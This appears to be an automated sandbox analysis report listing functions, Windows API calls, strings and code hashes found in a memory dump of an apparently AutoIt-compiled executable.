Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: b11866203d438bc512fba751915cf39d85da3d4751abec8822e90b45c4f7ccf0
Instruction ID: d3c6b27e57ca2213340bf5b71825bdf5775eff803f5f582bd12414ceca02348f
Opcode Fuzzy Hash: b11866203d438bc512fba751915cf39d85da3d4751abec8822e90b45c4f7ccf0
Instruction Fuzzy Hash: 26E0B6B8581300AFEB10AB61FC0DF057EA6B724B42F20802DF215E15A1CBF48595CA14

Uniqueness

Uniqueness Score: -1.00%

Function 001A675A, Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 001A68AD
_memmove.LIBCMT ref: 001A67E8

Part of subcall function 00149997: __itow.LIBCMT ref: 001499C2
Part of subcall function 00149997: __swprintf.LIBCMT ref: 00149A0C

_memmove.LIBCMT ref: 001A685B
_memmove.LIBCMT ref: 001A6942
_memmove.LIBCMT ref: 001A695B
_memmove.LIBCMT ref: 001A6977

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 599bb91655ab1badc0b0c4e8a4f67bf284fc09e0370b2c82a5200c500f71c093
Instruction ID: a56a1a1cb6afee92e91e58b6dfd924e4e1c0fdf1ec960c72c6ccb5ffd8ec93f2
Opcode Fuzzy Hash: 599bb91655ab1badc0b0c4e8a4f67bf284fc09e0370b2c82a5200c500f71c093
Instruction Fuzzy Hash: 0761F13450425AAFCF15EF60CC82EFF37A9AF65308F094519F85A5B2A2DB34AC11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001C046F, Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00147F41: _memmove.LIBCMT ref: 00147F82

Part of subcall function 001C10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001C0038,?,?), ref: 001C10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001C0548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001C0588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 001C05AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001C05D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 001C0617
RegCloseKey.ADVAPI32(00000000), ref: 001C0624

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: b24ea29c44d5ac6687f2c1720be4b63ffabed7017523673bf127ec8cdf6b5af9
Instruction ID: d66c4f0a323d867e4f3faa4408c2850287fb7eccd96e649d9d2744af713be4d1
Opcode Fuzzy Hash: b24ea29c44d5ac6687f2c1720be4b63ffabed7017523673bf127ec8cdf6b5af9
Instruction Fuzzy Hash: 70515631208200EFCB15EF64C885E6BBBE9FFA9714F04492DF495872A2DB31E915CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0019F3DD, Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0019F3F7
VariantClear.OLEAUT32(00000013), ref: 0019F469
VariantClear.OLEAUT32(00000000), ref: 0019F4C4
_memmove.LIBCMT ref: 0019F4EE
VariantClear.OLEAUT32(?), ref: 0019F53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0019F569

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 560c9f4665c001d710492108788eb840fe65b1a08589de175bd12903706431e7
Instruction ID: 714d25d5fd1512d8d46509a3d76f89f54f249525b24b64bb4fd7e5524eb52d33
Opcode Fuzzy Hash: 560c9f4665c001d710492108788eb840fe65b1a08589de175bd12903706431e7
Instruction Fuzzy Hash: 03515BB5A00209EFDB14CF58D884EAAB7B9FF48314B15816DE959DB310D730E952CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001A26F9, Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001A2747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001A2792
IsMenu.USER32 ref: 001A27B2
CreatePopupMenu.USER32(00206890,00000000,774233D0), ref: 001A27E6
GetMenuItemCount.USER32 ref: 001A2844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 001A2875

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 3c25cc3c5f67b49dd18e4387ec4ad40ad3a68d95e9dc843dcb7d2564768b4aba
Instruction ID: 81974f4a7c6740cbe54de8d0b9277e501f5e170351ebc4bf44aa524bb83c3e4e
Opcode Fuzzy Hash: 3c25cc3c5f67b49dd18e4387ec4ad40ad3a68d95e9dc843dcb7d2564768b4aba
Instruction Fuzzy Hash: E751C278A00309EFDF25CFACD988BAEBBF5AF56314F104169F8119B291D7788944CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00141765, Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00142612: GetWindowLongW.USER32(?,000000EB), ref: 00142623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0014179A
GetWindowRect.USER32 ref: 001417FE
ScreenToClient.USER32 ref: 0014181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0014182C
EndPaint.USER32(?,?), ref: 00141876

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: f59615542df2c877e3cf513396bbb219f89d23f9a154838b389aae6992874c9c
Instruction ID: c35abf366ecf398d7644b15f2daf6097f1ba0ad7bec55a480d0ac9d911e19f5c
Opcode Fuzzy Hash: f59615542df2c877e3cf513396bbb219f89d23f9a154838b389aae6992874c9c
Instruction Fuzzy Hash: 60418C71104301AFD711DF24D888FBA7BF9EB59724F144629F998872B2C7319889DB61

Uniqueness

Uniqueness Score: -1.00%

Function 001B73B1, Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,001B5134,?,?,00000000,00000001), ref: 001B73BF

Part of subcall function 001B3C94: GetWindowRect.USER32 ref: 001B3CA7

GetDesktopWindow.USER32 ref: 001B73E9
GetWindowRect.USER32 ref: 001B73F0
mouse_event.USER32 ref: 001B7422

Part of subcall function 001A54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001A555E

GetCursorPos.USER32(?,?,?,?,?,?,001B5134,?,?,00000000,00000001), ref: 001B744E
mouse_event.USER32 ref: 001B74AC

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: e9bbb2f6f544a1f3f94613d4baf2f86a39fd4ababdc72bd1e4ef556c740351db
Instruction ID: 14af65fe98f0861eadb2d293269a4e3abd72b210df60759ade6349837cc02722
Opcode Fuzzy Hash: e9bbb2f6f544a1f3f94613d4baf2f86a39fd4ababdc72bd1e4ef556c740351db
Instruction Fuzzy Hash: 3131D272508305ABD720DF54D849E9BBBAAFF89314F000929F58997191DB30EA49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00198D5B, Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001985F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00198608
Part of subcall function 001985F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00198612
Part of subcall function 001985F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00198621
Part of subcall function 001985F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00198628
Part of subcall function 001985F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0019863E

GetLengthSid.ADVAPI32(?,00000000,00198977), ref: 00198DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00198DB8
HeapAlloc.KERNEL32(00000000), ref: 00198DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 00198DD8
GetProcessHeap.KERNEL32(00000000,00000000,00198977), ref: 00198DEC
HeapFree.KERNEL32(00000000), ref: 00198DF3

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 0954561b60f7be1985d06148751e7b455da49b787a27bee8720be5390a29d3c0
Instruction ID: 6c802b6fa555ce8711838fd19153a16af98fdcd3e20fafff4f82bac58ac3e52b
Opcode Fuzzy Hash: 0954561b60f7be1985d06148751e7b455da49b787a27bee8720be5390a29d3c0
Instruction Fuzzy Hash: 4911A932601605FFDF149FA4CC09FAE7BAAEF56315F14402EF84997291CB32A985CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00198AF9, Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00198B2A
OpenProcessToken.ADVAPI32(00000000), ref: 00198B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00198B40
CloseHandle.KERNEL32(00000004), ref: 00198B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00198B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 00198B8E

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: f6d2836199f9d39d3f76f212422cbba0d7d0416ba2d48b393dd77021b353d771
Instruction ID: 068b6a73229bba7871a03fd60ddb182f55c3b2050b94539e7a586cac49efe459
Opcode Fuzzy Hash: f6d2836199f9d39d3f76f212422cbba0d7d0416ba2d48b393dd77021b353d771
Instruction Fuzzy Hash: 79115CB2500249ABDF018FA4DD49FDA7BAAFF09704F084069FE05A2160C772CD61DB60

Uniqueness

Uniqueness Score: -1.00%

Function 001CC19A, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 001412F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0014134D
Part of subcall function 001412F3: SelectObject.GDI32(?,00000000), ref: 0014135C
Part of subcall function 001412F3: BeginPath.GDI32(?), ref: 00141373
Part of subcall function 001412F3: SelectObject.GDI32(?,00000000), ref: 0014139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 001CC1C4
LineTo.GDI32(00000000,00000003,?), ref: 001CC1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 001CC1E6
LineTo.GDI32(00000000,00000000,?), ref: 001CC1F6
EndPath.GDI32(00000000), ref: 001CC206
StrokePath.GDI32(00000000), ref: 001CC216

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 67747188dd18dc962b9a15b4ea8726fa446f563fe9a5c9d90eabc70a1c73db0d
Instruction ID: 8f4bb6e8d396c3f0d86f6cd0c74b62915451899bc50c1b7bcd7f93254a6f00bc
Opcode Fuzzy Hash: 67747188dd18dc962b9a15b4ea8726fa446f563fe9a5c9d90eabc70a1c73db0d
Instruction Fuzzy Hash: 1211DB7640014DBFDF119F94DC88FAA7FAEFB08354F048025FA189A1A1D7719DA5DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001603A2, Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 001603D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 001603DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 001603E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 001603F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 001603F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00160401

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 08e059fff13d3f8eca6d0dc40b0c97844d505f67b8376da72f15b2fda6d04c01
Instruction ID: 0e9b6e567b3288db49fe8121ccfd6c834a8b7c6b18c2605b806fd664030a910a
Opcode Fuzzy Hash: 08e059fff13d3f8eca6d0dc40b0c97844d505f67b8376da72f15b2fda6d04c01
Instruction Fuzzy Hash: 17016CB09017597DE3008F5A8C85B52FFA8FF19354F00411FA15C47941C7F5A864CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 001A568B, Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 001A569B
SendMessageTimeoutW.USER32 ref: 001A56B1
GetWindowThreadProcessId.USER32(?,?), ref: 001A56C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001A56CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001A56D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001A56E0

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: db7ba6f87729ebb666c5286d38df8158507239eec73d25523fe3faa432c6af5d
Instruction ID: d3f0b0cdf2c0b4c022609b1766f7beeca4420b6584d9a5d9bc280b99b2d8ffb7
Opcode Fuzzy Hash: db7ba6f87729ebb666c5286d38df8158507239eec73d25523fe3faa432c6af5d
Instruction Fuzzy Hash: BFF06D32241168BBE3205BA29C0DEEB7E7DEBC6B11F00016DFA04D105097A19A42C6B5

Uniqueness

Uniqueness Score: -1.00%

Function 00198E74, Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00198E7F
UnloadUserProfile.USERENV(?,?), ref: 00198E8B
CloseHandle.KERNEL32(?), ref: 00198E94
CloseHandle.KERNEL32(?), ref: 00198E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00198EA5
HeapFree.KERNEL32(00000000), ref: 00198EAC

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 2fcca122cbe746990e90c57e74b7c62ba2709a3a7b99a9113ab1866346ca214c
Instruction ID: b73eb9044e3a0ba93bf2749f0bd06a48f367ef733ecbeca382d5c82c4bcb2652
Opcode Fuzzy Hash: 2fcca122cbe746990e90c57e74b7c62ba2709a3a7b99a9113ab1866346ca214c
Instruction Fuzzy Hash: 0FE05276104545FBDA011FE6EC0CD5ABF6AFB89762B54863AF21981870CB3294A2DB50

Uniqueness

Uniqueness Score: -1.00%

Function 001B8902, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001B8928
CharUpperBuffW.USER32(?,?), ref: 001B8A37
VariantClear.OLEAUT32(?), ref: 001B8BAF

Part of subcall function 001A7804: VariantInit.OLEAUT32(00000000), ref: 001A7844
Part of subcall function 001A7804: VariantCopy.OLEAUT32(00000000,?), ref: 001A784D
Part of subcall function 001A7804: VariantClear.OLEAUT32(00000000), ref: 001A7859

Strings

AUTOIT.ERROR, xrefs: 001B8A3D
Incorrect Parameter format, xrefs: 001B8960, 001B8B22

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 930608a956c57cb12ed6cb98239cd29fa87c309f44de8dcdd74c03457219f0df
Instruction ID: 9392eeeac8477e00cbe845d98fd6013260145f3ad9f03ff37ec324b97a11e3d0
Opcode Fuzzy Hash: 930608a956c57cb12ed6cb98239cd29fa87c309f44de8dcdd74c03457219f0df
Instruction Fuzzy Hash: BE919F716083019FCB04DF24C5809ABBBE8EFD9714F14496EF89A8B361DB30E946CB52

Uniqueness

Uniqueness Score: -1.00%

Function 001A2F86, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0015FEC6: _wcscpy.LIBCMT ref: 0015FEE9

_memset.LIBCMT ref: 001A3077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001A30A6
SetMenuItemInfoW.USER32 ref: 001A3159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 001A3187

Strings

0, xrefs: 001A3063

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 1df6ca416f86554fd8534281b1aab1d0ba752a823a89c2ea7b33fa4b1e238120
Instruction ID: 03a747018b17762bd390eee32dd5045af53c158713037ea44adf8e7cf9a8626d
Opcode Fuzzy Hash: 1df6ca416f86554fd8534281b1aab1d0ba752a823a89c2ea7b33fa4b1e238120
Instruction Fuzzy Hash: 6451E3796083009FD7299F28D849B6BBBE4EF56320F044A2DF8A5D31E1DB70CE548792

Uniqueness

Uniqueness Score: -1.00%

Function 001A2C42, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001A2CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 001A2CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 001A2D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00206890,00000000), ref: 001A2D5A

Strings

0, xrefs: 001A2CA4

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 10a6819034aff0c912eeb910472bd07f0b1c3c9b3f761906fddcd0e1fbc8e105
Instruction ID: 41cfad4b102f803c5bf9548d3e6f27502eea9e0f1864fae4a7d7b93c5fc1c2f1
Opcode Fuzzy Hash: 10a6819034aff0c912eeb910472bd07f0b1c3c9b3f761906fddcd0e1fbc8e105
Instruction Fuzzy Hash: 61419F342043029FD724DF68C845F5ABBE8EF96320F14466DF966972E2D770E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00199372, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00147F41: _memmove.LIBCMT ref: 00147F82

Part of subcall function 0019B0C4: GetClassNameW.USER32 ref: 0019B0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001993F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00199409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00199439

Part of subcall function 00147D2C: _memmove.LIBCMT ref: 00147D66

Strings

ListBox, xrefs: 001993B5
ComboBox, xrefs: 00199380

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 7a9d34083a14b5b44435e1439b8a7fbb5e4d6d10e1d1779223158c47b4c0c4c4
Instruction ID: e771de9ffac10ab2bb3c5f10928ec9d198aec86a7c47126c9edb671f647b1d55
Opcode Fuzzy Hash: 7a9d34083a14b5b44435e1439b8a7fbb5e4d6d10e1d1779223158c47b4c0c4c4
Instruction Fuzzy Hash: 832121B1900108BBDF18ABB8DC86CFFBB79DF55320B14412DF925972E1DB344A0A9660

Uniqueness

Uniqueness Score: -1.00%

Function 001C6656, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00141D35: CreateWindowExW.USER32 ref: 00141D73
Part of subcall function 00141D35: GetStockObject.GDI32(00000011), ref: 00141D87
Part of subcall function 00141D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00141D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001C66D0
LoadLibraryW.KERNEL32(?), ref: 001C66D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001C66EC
DestroyWindow.USER32(?), ref: 001C66F4

Strings

SysAnimate32, xrefs: 001C66AB

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 4ae0dffc38b04608d70dbb7a3bce775c6d7be598b9f40ad465c5def272a4ebf1
Instruction ID: 38c71c39b1eb4dc3aec386d8e538c05095c47a94fd44411490e3b2036b6fc9ac
Opcode Fuzzy Hash: 4ae0dffc38b04608d70dbb7a3bce775c6d7be598b9f40ad465c5def272a4ebf1
Instruction Fuzzy Hash: 2A219AB120021ABBEF104F64EC80FBB77ADEF69368F50462DFA10921A0D771CC919761

